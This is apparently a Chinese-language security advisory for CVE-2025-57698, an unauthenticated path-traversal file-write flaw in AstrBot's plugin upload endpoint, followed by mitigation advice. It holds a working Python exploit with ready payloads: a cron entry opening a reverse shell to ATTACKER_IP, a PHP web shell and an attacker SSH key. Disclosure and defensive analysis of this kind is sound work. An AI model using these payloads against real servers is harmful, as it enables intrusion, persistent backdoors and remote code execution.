CVE-2025-57698: AstrBot Project 目录遍历漏洞导致任意文件写入

漏洞信息

漏洞编号

CVE-2025-57698

漏洞类型

目录遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AstrBot Project

漏洞概述

CVE-2025-57698是AstrBot Project v3.5.22版本中存在的一个高危安全漏洞，CVSS评分达到7.5分，属于高危级别。该漏洞位于AstrBot的插件安装功能模块中，具体为'/plugin/install-upload'接口的install_plugin_upload处理函数。该函数在处理用户上传的插件文件时，直接从HTTP请求体中提取文件名参数，并将其赋值给file_path变量，而没有对文件名进行任何有效性验证或安全过滤。攻击者可以利用这一缺陷，在文件名中包含路径遍历序列（如../），从而将上传的文件写入服务器文件系统上的任意位置。这种任意文件写入漏洞可能被进一步利用来执行远程代码执行、覆盖系统配置文件、植入后门程序或获取服务器完全控制权。由于该漏洞无需认证即可利用，且攻击复杂度较低，因此对暴露在网络中的AstrBot服务器构成严重威胁。

技术细节

该漏洞的根本原因在于AstrBot Project的插件安装功能缺少必要的输入验证机制。具体分析如下：

1. 漏洞位置：AstrBot的'/plugin/install-upload'接口
2. 漏洞函数：install_plugin_upload
3. 漏洞原理：处理函数从用户请求体中获取filename参数后，直接将其赋值给file_path变量，未进行路径规范化或安全检查
4. 文件操作：file_path变量被直接传递给file.save()函数执行文件保存操作
5. 利用方式：攻击者构造包含目录遍历字符的恶意文件名，如"../../../../etc/cron.d/malicious"或"../../../var/www/html/backdoor.php"

漏洞代码流程：
- 用户发送POST请求到'/plugin/install-upload'接口
- 请求体中包含filename字段，值为路径遍历Payload
- install_plugin_upload函数解析filename并赋值给file_path
- file_path未经任何安全检查直接用于文件保存
- 攻击者上传的恶意文件被写入服务器任意位置

该漏洞允许未经认证的远程攻击者实现任意文件写入，可能导致远程代码执行、配置篡改或服务中断等严重后果。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标服务器上运行的AstrBot Project版本，确认版本为v3.5.22或存在漏洞的版本

STEP 2

步骤2

构造Payload：攻击者构造包含目录遍历序列的恶意文件名，如../../../../var/www/html/backdoor.php

STEP 3

步骤3

发送恶意请求：向目标服务器的'/plugin/install-upload'接口发送POST请求，在请求体中包含构造的恶意文件名和文件内容

STEP 4

步骤4

文件写入成功：由于install_plugin_upload函数未验证文件名，攻击者指定的文件被写入服务器任意位置

STEP 5

步骤5

后门植入：攻击者可写入WebShell或定时任务脚本，建立持久化访问通道

STEP 6

步骤6

远程代码执行：通过访问写入的WebShell或等待定时任务执行，攻击者获得服务器远程代码执行能力

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-57698 PoC - AstrBot Directory Traversal File Write
# Target: AstrBot Project v3.5.22
# Vulnerability: Path traversal in /plugin/install-upload endpoint

target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"

def exploit_directory_traversal(target_url, filename, content):
    """
    Exploit the directory traversal vulnerability to write arbitrary files
    """
    url = f"{target_url}/plugin/install-upload"
    
    # Prepare the malicious file content
    files = {
        'file': (filename, content, 'application/octet-stream')
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Target file path: {filename}")
        
        response = requests.post(url, files=files, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")
        
        if response.status_code == 200:
            print("[+] Exploit sent successfully!")
            return True
        else:
            print("[-] Exploit may have failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

# Example 1: Write to cron.d for reverse shell
filename1 = "../../../../etc/cron.d/backdoor"
content1 = "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'\n"

# Example 2: Write web shell
filename2 = "../../../var/www/html/uploads/shell.php"
content2 = "<?php system($_GET['cmd']); ?>"

# Example 3: Write to user home directory
filename3 = "../../../../home/astrabot/.ssh/authorized_keys"
content3 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC... attacker@localhost"

if __name__ == "__main__":
    print("CVE-2025-57698 PoC - AstrBot Directory Traversal")
    print("=" * 50)
    
    # Test with web shell example
    exploit_directory_traversal(target, filename2, content2)

影响范围

AstrBot Project v3.5.22

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 通过网络层访问控制限制对'/plugin/install-upload'接口的访问，仅允许受信任的IP地址访问；2) 暂时禁用插件上传功能，等待官方安全更新；3) 在Web服务器层面配置URL过滤规则，拦截包含"../"序列的请求；4) 对插件上传目录实施严格的文件权限控制，限制写入位置；5) 启用详细的访问日志和文件完整性监控，及时发现异常文件写入行为；6) 考虑使用Docker容器化部署AstrBot，将应用进程与宿主机文件系统隔离。